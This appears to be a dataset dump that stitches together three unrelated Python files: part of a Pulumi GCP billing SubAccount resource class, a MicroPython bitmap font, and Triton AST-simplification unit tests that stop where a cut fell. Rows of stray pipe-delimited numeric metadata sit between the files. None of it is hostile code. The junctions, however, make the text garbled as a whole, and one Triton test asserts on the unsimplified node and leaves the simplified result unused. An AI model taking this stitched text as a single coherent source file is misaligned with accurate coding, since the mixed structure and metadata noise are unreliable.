        :param str resource_name: The name of the resource.
        :param SubAccountArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher for the two @overload signatures above: detect
        # whether the caller passed a SubAccountArgs bundle or bare kwargs,
        # then forward to _internal_init either way.
        resource_args, opts = _utilities.get_resource_args_opts(SubAccountArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 deletion_policy: Optional[pulumi.Input[str]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 master_billing_account: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Single real constructor: validates options, then registers the
        # resource with the Pulumi engine.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (no provider id): __props__ must not be
            # pre-supplied, required inputs must be present unless the engine
            # is rehydrating from an URN, and output-only fields start as None.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = SubAccountArgs.__new__(SubAccountArgs)

            __props__.__dict__["deletion_policy"] = deletion_policy
            if display_name is None and not opts.urn:
                raise TypeError("Missing required property 'display_name'")
            __props__.__dict__["display_name"] = display_name
            if master_billing_account is None and not opts.urn:
                raise TypeError("Missing required property 'master_billing_account'")
            __props__.__dict__["master_billing_account"] = master_billing_account
            __props__.__dict__["billing_account_id"] = None
            __props__.__dict__["name"] = None
            __props__.__dict__["open"] = None
        super(SubAccount, __self__).__init__(
            'gcp:billing/subAccount:SubAccount',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            billing_account_id: Optional[pulumi.Input[str]] = None,
            deletion_policy: Optional[pulumi.Input[str]] = None,
            display_name: Optional[pulumi.Input[str]] = None,
            master_billing_account: Optional[pulumi.Input[str]] = None,
            name: Optional[pulumi.Input[str]] = None,
            open: Optional[pulumi.Input[bool]] = None) -> 'SubAccount':
        """
        Get an existing SubAccount resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] billing_account_id: The billing account id.
        :param pulumi.Input[str] deletion_policy: If set to "RENAME_ON_DESTROY" the billing account display_name
               will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
               Default is "".
        :param pulumi.Input[str] display_name: The display name of the billing account.
        :param pulumi.Input[str] master_billing_account: The name of the master billing account that the subaccount
               will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
        :param pulumi.Input[str] name: The resource name of the billing account in the form `billingAccounts/{billing_account_id}`.
        :param pulumi.Input[bool] open: `true` if the billing account is open, `false` if the billing account is closed.
        """
        # Supplying an id in opts makes _internal_init take the "read existing
        # resource" path instead of creating a new one.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _SubAccountState.__new__(_SubAccountState)

        __props__.__dict__["billing_account_id"] = billing_account_id
        __props__.__dict__["deletion_policy"] = deletion_policy
        __props__.__dict__["display_name"] = display_name
        __props__.__dict__["master_billing_account"] = master_billing_account
        __props__.__dict__["name"] = name
        __props__.__dict__["open"] = open
        return SubAccount(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="billingAccountId")
    def billing_account_id(self) -> pulumi.Output[str]:
        """
        The billing account id.
        """
        return pulumi.get(self, "billing_account_id")

    @property
    @pulumi.getter(name="deletionPolicy")
    def deletion_policy(self) -> pulumi.Output[Optional[str]]:
        """
        If set to "RENAME_ON_DESTROY" the billing account display_name
        will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
        Default is "".
        """
        return pulumi.get(self, "deletion_policy")

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> pulumi.Output[str]:
        """
        The display name of the billing account.
        """
        return pulumi.get(self, "display_name")

    @property
    @pulumi.getter(name="masterBillingAccount")
    def master_billing_account(self) -> pulumi.Output[str]:
        """
        The name of the master billing account that the subaccount
        will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
        """
        return pulumi.get(self, "master_billing_account")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        The resource name of the billing account in the form `billingAccounts/{billing_account_id}`.
        """
        return pulumi.get(self, "name")

    @property
    @pulumi.getter
    def open(self) -> pulumi.Output[bool]:
        """
        `true` if the billing account is open, `false` if the billing account is closed.
        """
        return pulumi.get(self, "open")
| 43.385013
| 134
| 0.651936
| 1,991
| 16,790
| 5.243094
| 0.088398
| 0.147524
| 0.07108
| 0.061117
| 0.829677
| 0.802855
| 0.76492
| 0.737427
| 0.727177
| 0.702845
| 0
| 0.001994
| 0.253186
| 16,790
| 386
| 135
| 43.497409
| 0.830529
| 0.371948
| 0
| 0.553299
| 1
| 0
| 0.113605
| 0.026873
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15736
| false
| 0.005076
| 0.025381
| 0
| 0.279188
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ba44b6cabc2124caf0be3c0a326b51935bb9868
| 3,331
|
py
|
Python
|
frozen/font12.py
|
ayoy/micropython-waveshare-epd
|
58859f5d0158987c84fb20e3920af0962b37de61
|
[
"MIT"
] | 45
|
2018-04-02T22:24:47.000Z
|
2022-03-27T14:34:06.000Z
|
frozen/font12.py
|
ayoy/micropython-waveshare-epd
|
58859f5d0158987c84fb20e3920af0962b37de61
|
[
"MIT"
] | 2
|
2018-09-19T09:39:20.000Z
|
2019-05-23T09:56:29.000Z
|
frozen/font12.py
|
ayoy/micropython-waveshare-epd
|
58859f5d0158987c84fb20e3920af0962b37de61
|
[
"MIT"
] | 16
|
2018-04-08T21:34:28.000Z
|
2022-03-18T16:00:38.000Z
|
# Fixed-cell glyph dimensions for this bitmap font; const() is the MicroPython
# compile-time constant declaration. Presumably consumed by the Waveshare EPD
# text renderer together with the `data` bitmap below — TODO confirm against caller.
width = const(7)    # glyph width in pixels
height = const(12)  # glyph height in pixels
data = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x10\x10\x10\x10\x00\x00\x10\x00\x00\x00\x00lHH\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x14(|(|(PP\x00\x00\x00\x108@@8Hp\x10\x10\x00\x00\x00 P \x0cp\x08\x14\x08\x00\x00\x00\x00\x00\x00\x18 TH4\x00\x00\x00\x00\x10\x10\x10\x10\x00\x00\x00\x00\x00\x00\x00\x00\x08\x08\x10\x10\x10\x10\x10\x10\x08\x08\x00\x00 \x10\x10\x10\x10\x10\x10 \x00\x00\x10|\x10((\x00\x00\x00\x00\x00\x00\x00\x00\x10\x10\x10\xfe\x10\x10\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x100 \x00\x00\x00\x00\x00\x00|\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000\x00\x00\x00\x00\x04\x04\x08\x08\x10\x10 @\x00\x00\x008DDDDDD8\x00\x00\x00\x000\x10\x10\x10\x10\x10\x10|\x00\x00\x00\x008D\x04\x08\x10 D|\x00\x00\x00\x008D\x04\x18\x04\x04D8\x00\x00\x00\x00\x0c\x14\x14$D~\x04\x0e\x00\x00\x00\x00< 8\x04\x04D8\x00\x00\x00\x00\x1c @xDDD8\x00\x00\x00\x00|D\x04\x08\x08\x08\x10\x10\x00\x00\x00\x008DD8DDD8\x00\x00\x00\x008DDD<\x04\x08p\x00\x00\x00\x00\x00\x0000\x00\x0000\x00\x00\x00\x00\x00\x00\x18\x18\x00\x00\x180 \x00\x00\x00\x00\x0c\x10`\x80`\x10\x0c\x00\x00\x00\x00\x00\x00\x00|\x00|\x00\x00\x00\x00\x00\x00\x00\xc0 \x18\x04\x18 \xc0\x00\x00\x00\x00\x00\x18$\x04\x08\x10\x000\x00\x00\x008DDLTTL@D8\x00\x00\x000\x10(((|D\xee\x00\x00\x00\x00\xf8DDxDDD\xf8\x00\x00\x00\x00<D@@@@D8\x00\x00\x00\x00\xf0HDDDDH\xf0\x00\x00\x00\x00\xfcDPpP@D\xfc\x00\x00\x00\x00~"(8( p\x00\x00\x00\x00<D@@NDD8\x00\x00\x00\x00\xeeDD|DDD\xee\x00\x00\x00\x00|\x10\x10\x10\x10\x10\x10|\x00\x00\x00\x00<\x08\x08\x08HHH0\x00\x00\x00\x00\xeeDHPpHD\xe6\x00\x00\x00\x00p $$|\x00\x00\x00\x00\xeellTTDD\xee\x00\x00\x00\x00\xeeddTTTL\xec\x00\x00\x00\x008DDDDDD8\x00\x00\x00\x00x$$$8 
p\x00\x00\x00\x008DDDDDD8\x1c\x00\x00\x00\xf8DDDxHD\xe2\x00\x00\x00\x004L@8\x04\x04dX\x00\x00\x00\x00\xfe\x92\x10\x10\x10\x10\x108\x00\x00\x00\x00\xeeDDDDDD8\x00\x00\x00\x00\xeeDD(((\x10\x10\x00\x00\x00\x00\xeeDDTTTT(\x00\x00\x00\x00\xc6D(\x10\x10(D\xc6\x00\x00\x00\x00\xeeD((\x10\x10\x108\x00\x00\x00\x00|D\x08\x10\x10 D|\x00\x00\x00\x008 8\x00\x00@ \x10\x10\x08\x08\x08\x00\x00\x008\x08\x08\x08\x08\x08\x08\x08\x088\x00\x00\x10\x10(D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x00\x10\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008D<DD>\x00\x00\x00\x00\xc0@XdDDD\xf8\x00\x00\x00\x00\x00\x00<D@@D8\x00\x00\x00\x00\x0c\x044LDDD>\x00\x00\x00\x00\x00\x008D|@@<\x00\x00\x00\x00\x1c | |\x00\x00\x00\x00\x00\x006LDDD<\x048\x00\x00\xc0@XdDDD\xee\x00\x00\x00\x00\x10\x00p\x10\x10\x10\x10|\x00\x00\x00\x00\x10\x00x\x08\x08\x08\x08\x08\x08p\x00\x00\xc0@\\HpPH\xdc\x00\x00\x00\x000\x10\x10\x10\x10\x10\x10|\x00\x00\x00\x00\x00\x00\xe8TTTT\xfe\x00\x00\x00\x00\x00\x00\xd8dDDD\xee\x00\x00\x00\x00\x00\x008DDDD8\x00\x00\x00\x00\x00\x00\xd8dDDDx@\xe0\x00\x00\x00\x006LDDD<\x04\x0e\x00\x00\x00\x00l0 |\x00\x00\x00\x00\x00\x00<D8\x04Dx\x00\x00\x00\x00\x00 | "\x1c\x00\x00\x00\x00\x00\x00\xccDDDL6\x00\x00\x00\x00\x00\x00\xeeDD((\x10\x00\x00\x00\x00\x00\x00\xeeDTTT(\x00\x00\x00\x00\x00\x00\xccH00H\xcc\x00\x00\x00\x00\x00\x00\xeeD$(\x18\x10\x10x\x00\x00\x00\x00|H\x10 D|\x00\x00\x00\x00\x08\x10\x10\x10\x10 \x10\x10\x10\x08\x00\x00\x10\x10\x10\x10\x10\x10\x10\x10\x10\x00\x00\x00 \x10\x10\x10\x10\x08\x10\x10\x10 \x00\x00\x00\x00\x00\x00$X\x00\x00\x00\x00\x00'
| 666.2
| 3,293
| 0.733714
| 759
| 3,331
| 3.220026
| 0.119895
| 0.844517
| 0.920622
| 0.829787
| 0.709083
| 0.572831
| 0.402209
| 0.317512
| 0.2991
| 0.252455
| 0
| 0.430976
| 0.019213
| 3,331
| 4
| 3,294
| 832.75
| 0.317111
| 0
| 0
| 0
| 0
| 0.333333
| 0.98559
| 0.956169
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
2bb0e280ec76855c1f31ea8435f7a89931c064f6
| 17,319
|
py
|
Python
|
src/testers/unittests/test_ast_simplification.py
|
XVilka/Triton
|
a6645a1d0e08b27b6698be7c2c0896d3367fd0b4
|
[
"Apache-2.0"
] | 2
|
2021-01-29T09:26:22.000Z
|
2021-04-23T16:28:44.000Z
|
src/testers/unittests/test_ast_simplification.py
|
XVilka/Triton
|
a6645a1d0e08b27b6698be7c2c0896d3367fd0b4
|
[
"Apache-2.0"
] | null | null | null |
src/testers/unittests/test_ast_simplification.py
|
XVilka/Triton
|
a6645a1d0e08b27b6698be7c2c0896d3367fd0b4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
"""Testing AST simplification."""
import unittest
from triton import *
class TestAstSimplification1(unittest.TestCase):
    """Testing AST simplification."""

    def setUp(self):
        # Fresh x86-64 context with both rewrite callbacks registered; the
        # callbacks are applied when ctx.simplify() is called below.
        self.ctx = TritonContext()
        self.ctx.setArchitecture(ARCH.X86_64)
        self.ctx.addCallback(self.xor_1, CALLBACK.SYMBOLIC_SIMPLIFICATION)
        self.ctx.addCallback(self.xor_2, CALLBACK.SYMBOLIC_SIMPLIFICATION)
        self.astCtxt = self.ctx.getAstContext()

    def test_simplification(self):
        # Checks the textual (SMT-LIB) form of each simplified node.
        a = self.astCtxt.bv(1, 8)
        b = self.astCtxt.bv(2, 8)

        # Example 1: a ^ a folds to zero via xor_1.
        c = a ^ a
        c = self.ctx.simplify(c)
        self.assertEqual(str(c), "(_ bv0 8)")

        # a ^ b is already minimal: no rewrite fires.
        c = a ^ b
        c = self.ctx.simplify(c)
        self.assertEqual(str(c), "(bvxor (_ bv1 8) (_ bv2 8))")

        # Example 2 - forme A: (a & ~b) | (~a & b) rewrites to a ^ b via xor_2.
        c = (a & ~b) | (~a & b)
        c = self.ctx.simplify(c)
        self.assertEqual(str(c), "(bvxor (_ bv1 8) (_ bv2 8))")

        # Example 2 - forme B
        c = (~b & a) | (~a & b)
        c = self.ctx.simplify(c)
        self.assertEqual(str(c), "(bvxor (_ bv1 8) (_ bv2 8))")

        # Example 2 - forme C
        c = (~b & a) | (b & ~a)
        c = self.ctx.simplify(c)
        self.assertEqual(str(c), "(bvxor (_ bv1 8) (_ bv2 8))")

        # Example 2 - forme D: operand order of the result follows the non-NOT
        # children, hence bv2 before bv1 here.
        c = (b & ~a) | (~b & a)
        c = self.ctx.simplify(c)
        self.assertEqual(str(c), "(bvxor (_ bv2 8) (_ bv1 8))")

        return

    # a ^ a -> a = 0
    @staticmethod
    def xor_1(api, node):
        # Simplification callback: must return the (possibly rewritten) node.
        if node.getType() == AST_NODE.BVXOR:
            if node.getChildren()[0].equalTo(node.getChildren()[1]):
                return api.getAstContext().bv(0, node.getBitvectorSize())
        return node

    # ((a & ~b) | (~a & b)) -> (a ^ b)
    @staticmethod
    def xor_2(api, node):

        def getNot(node):
            # Return the child that is a BVNOT when exactly one child is; else None.
            a = node.getChildren()[0]
            b = node.getChildren()[1]
            if a.getType() == AST_NODE.BVNOT and b.getType() != AST_NODE.BVNOT:
                return a
            if b.getType() == AST_NODE.BVNOT and a.getType() != AST_NODE.BVNOT:
                return b
            return None

        def getNonNot(node):
            # Return the child that is NOT a BVNOT when exactly one child is; else None.
            a = node.getChildren()[0]
            b = node.getChildren()[1]
            if a.getType() != AST_NODE.BVNOT and b.getType() == AST_NODE.BVNOT:
                return a
            if b.getType() != AST_NODE.BVNOT and a.getType() == AST_NODE.BVNOT:
                return b
            return None

        if node.getType() == AST_NODE.BVOR:
            c1 = node.getChildren()[0]
            c2 = node.getChildren()[1]
            if c1.getType() == AST_NODE.BVAND and c2.getType() == AST_NODE.BVAND:
                c1_not = getNot(c1)
                c2_not = getNot(c2)
                c1_nonNot = getNonNot(c1)
                c2_nonNot = getNonNot(c2)
                # NOTE(review): getNot()/getNonNot() return None when a BVAND's
                # children are both (or neither) BVNOT, which would make the
                # equalTo() calls below raise — presumably unreachable for the
                # shapes exercised in this test; confirm before reuse.
                if c1_not.equalTo(~c2_nonNot) and c2_not.equalTo(~c1_nonNot):
                    return c1_nonNot ^ c2_nonNot
        return node
class TestAstSimplification2(unittest.TestCase):
    """Testing AST simplification. From #740."""

    def setUp(self):
        # Fresh x86-64 context with the constant-cancellation callback registered.
        self.ctx = TritonContext()
        self.ctx.setArchitecture(ARCH.X86_64)
        self.ctx.addCallback(self.simplification_0, CALLBACK.SYMBOLIC_SIMPLIFICATION)
        self.astCtxt = self.ctx.getAstContext()

    def test_simplification(self):
        """((SymVar - K) + 1) + K must simplify to (SymVar + 1)."""
        # (bvadd
        #   (bvadd
        #     (bvsub SymVar_2 (_ bv2142533311 64))
        #     (_ bv1 64)
        #   )
        #   (_ bv2142533311 64)
        # )
        a = self.astCtxt.bv(1, 64)
        b = self.astCtxt.bv(2142533311, 64)
        c = self.astCtxt.variable(self.ctx.newSymbolicVariable(64))
        node = (((c - b) + a) + b)
        snode = self.ctx.simplify(node)
        # BUG FIX: the original asserted on `node` (the unsimplified input) and
        # left `snode` unused, so the simplified result was never checked.
        # The assertions now inspect `snode`, the output of simplify().
        self.assertEqual(snode.getType(), AST_NODE.BVADD)
        self.assertEqual(snode.getChildren()[0], c)
        self.assertEqual(snode.getChildren()[1], a)

    @staticmethod
    def simplification_0(ctx, node):
        # (((var - val1) + val2) + val1) => (var + val2)
        if node.getType() == AST_NODE.BVADD:
            c0 = node.getChildren()[0]  # ((var - val1) + val2)
            c1 = node.getChildren()[1]  # val1
            if c0.getType() == AST_NODE.BVADD and c1.getType() == AST_NODE.BV:
                c00 = c0.getChildren()[0]  # (var - val1)
                c01 = c0.getChildren()[1]  # val2
                if c00.getType() == AST_NODE.BVSUB and c01.getType() == AST_NODE.BV:
                    c000 = c00.getChildren()[0]  # var
                    c001 = c00.getChildren()[1]  # val1
                    # Only cancel when the subtracted and added constants match.
                    if c001.getType() == AST_NODE.BV and c001.evaluate() == c1.evaluate():
                        # return (var + val2)
                        return c000 + c01
        return node
class TestAstSimplification3(unittest.TestCase):
    """Solver-checked identities for the default (non-optimizing) AST builder.

    Each test builds a candidate identity `n == expected` and proves it holds
    for all assignments by showing its negation is unsatisfiable.
    """

    def setUp(self):
        self.ctx = TritonContext()
        self.ctx.setArchitecture(ARCH.X86)
        self.ast = self.ctx.getAstContext()

    def proof(self, n):
        """Return True iff predicate `n` is a tautology (its negation is UNSAT)."""
        # Idiom fix: the original wrote `if self.ctx.isSat(...) == True:` —
        # an explicit comparison against True; test truthiness directly.
        return not self.ctx.isSat(self.ast.lnot(n))

    # x + 0 == x (both operand orders)
    def test_add1(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvadd(a, b)
        self.assertTrue(self.proof(n == a))

    def test_add2(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvadd(b, a)
        self.assertTrue(self.proof(n == a))

    # x & 0 == 0, x & ~0 == x, x & x == x
    def test_and1(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvand(a, b)
        self.assertTrue(self.proof(n == 0))

    def test_and2(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvand(b, a)
        self.assertTrue(self.proof(n == 0))

    def test_and3(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(-1, 32)
        n = self.ast.bvand(b, a)
        self.assertTrue(self.proof(n == a))

    def test_and4(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(-1, 32)
        n = self.ast.bvand(a, b)
        self.assertTrue(self.proof(n == a))

    def test_and5(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        n = self.ast.bvand(a, a)
        self.assertTrue(self.proof(n == a))

    # Shifts by 0 are identity; shifting a 32-bit value by >= 32 yields 0.
    def test_ashr1(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvashr(a, b)
        self.assertTrue(self.proof(n == a))

    def test_ashr2(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvashr(b, a)
        self.assertTrue(self.proof(n == 0))

    def test_lshr1(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvlshr(a, b)
        self.assertTrue(self.proof(n == a))

    def test_lshr2(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvlshr(b, a)
        self.assertTrue(self.proof(n == 0))

    def test_lshr3(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(32, 32)
        n = self.ast.bvlshr(a, b)
        self.assertTrue(self.proof(n == 0))

    # x * 0 == 0 (both operand orders)
    def test_mul1(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvmul(a, b)
        self.assertTrue(self.proof(n == 0))

    def test_mul2(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvmul(b, a)
        self.assertTrue(self.proof(n == 0))

    # x | 0 == x, x | ~0 == ~0, x | x == x
    def test_or1(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvor(b, a)
        self.assertTrue(self.proof(n == a))

    def test_or2(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvor(a, b)
        self.assertTrue(self.proof(n == a))

    def test_or3(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(-1, 32)
        n = self.ast.bvor(a, b)
        self.assertTrue(self.proof(n == -1))

    def test_or4(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(-1, 32)
        n = self.ast.bvor(b, a)
        self.assertTrue(self.proof(n == -1))

    def test_or5(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        n = self.ast.bvor(a, a)
        self.assertTrue(self.proof(n == a))

    # x / 1 == x (signed and unsigned)
    def test_sdiv1(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(1, 32)
        n = self.ast.bvsdiv(a, b)
        self.assertTrue(self.proof(n == a))

    def test_shl1(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvshl(b, a)
        self.assertTrue(self.proof(n == 0))

    def test_shl2(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvshl(a, b)
        self.assertTrue(self.proof(n == a))

    def test_shl3(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(33, 32)
        n = self.ast.bvshl(a, b)
        self.assertTrue(self.proof(n == 0))

    # x - 0 == x, 0 - x == -x, x - x == 0
    def test_sub1(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvsub(a, b)
        self.assertTrue(self.proof(n == a))

    def test_sub2(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvsub(b, a)
        self.assertTrue(self.proof(n == -a))

    def test_sub3(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        n = self.ast.bvsub(a, a)
        self.assertTrue(self.proof(n == 0))

    def test_udiv(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(1, 32)
        n = self.ast.bvudiv(a, b)
        self.assertTrue(self.proof(n == a))

    # x ^ 0 == x, x ^ x == 0
    def test_xor1(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvxor(a, b)
        self.assertTrue(self.proof(n == a))

    def test_xor2(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        b = self.ast.bv(0, 32)
        n = self.ast.bvxor(b, a)
        self.assertTrue(self.proof(n == a))

    def test_xor3(self):
        a = self.ast.variable(self.ctx.newSymbolicVariable(32))
        n = self.ast.bvxor(a, a)
        self.assertTrue(self.proof(n == 0))
class TestAstSimplification4(unittest.TestCase):
"""Testing AST simplification"""
def setUp(self):
self.ctx = TritonContext()
self.ctx.setArchitecture(ARCH.X86)
self.ast = self.ctx.getAstContext()
self.ctx.setMode(MODE.AST_OPTIMIZATIONS, True)
def proof(self, n):
if self.ctx.isSat(self.ast.lnot(n)) == True:
return False
return True
def test_add1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvadd(a, b)
self.assertTrue(self.proof(n == a))
def test_add2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvadd(b, a)
self.assertTrue(self.proof(n == a))
def test_and1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvand(a, b)
self.assertTrue(self.proof(n == 0))
def test_and2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvand(b, a)
self.assertTrue(self.proof(n == 0))
def test_and3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(-1, 32)
n = self.ast.bvand(b, a)
self.assertTrue(self.proof(n == a))
def test_and4(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(-1, 32)
n = self.ast.bvand(a, b)
self.assertTrue(self.proof(n == a))
def test_and5(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
n = self.ast.bvand(a, a)
self.assertTrue(self.proof(n == a))
def test_ashr1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvashr(a, b)
self.assertTrue(self.proof(n == a))
def test_ashr2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvashr(b, a)
self.assertTrue(self.proof(n == 0))
def test_lshr1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvlshr(a, b)
self.assertTrue(self.proof(n == a))
def test_lshr2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvlshr(b, a)
self.assertTrue(self.proof(n == 0))
def test_lshr3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(32, 32)
n = self.ast.bvlshr(a, b)
self.assertTrue(self.proof(n == 0))
def test_mul1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvmul(a, b)
self.assertTrue(self.proof(n == 0))
def test_mul2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvmul(b, a)
self.assertTrue(self.proof(n == 0))
def test_or1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvor(b, a)
self.assertTrue(self.proof(n == a))
def test_or2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvor(a, b)
self.assertTrue(self.proof(n == a))
def test_or3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(-1, 32)
n = self.ast.bvor(a, b)
self.assertTrue(self.proof(n == -1))
def test_or4(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(-1, 32)
n = self.ast.bvor(b, a)
self.assertTrue(self.proof(n == -1))
def test_or5(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
n = self.ast.bvor(a, a)
self.assertTrue(self.proof(n == a))
def test_sdiv1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(1, 32)
n = self.ast.bvsdiv(a, b)
self.assertTrue(self.proof(n == a))
def test_shl1(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvshl(b, a)
self.assertTrue(self.proof(n == 0))
def test_shl2(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(0, 32)
n = self.ast.bvshl(a, b)
self.assertTrue(self.proof(n == a))
def test_shl3(self):
a = self.ast.variable(self.ctx.newSymbolicVariable(32))
b = self.ast.bv(33, 32)
n = self.ast.bvshl(a, b)
self.assertTrue(self.proof(n == 0))
def test_sub1(self):
    """Prove x - 0 == x (zero is the right identity of subtraction)."""
    sym = self.ast.variable(self.ctx.newSymbolicVariable(32))
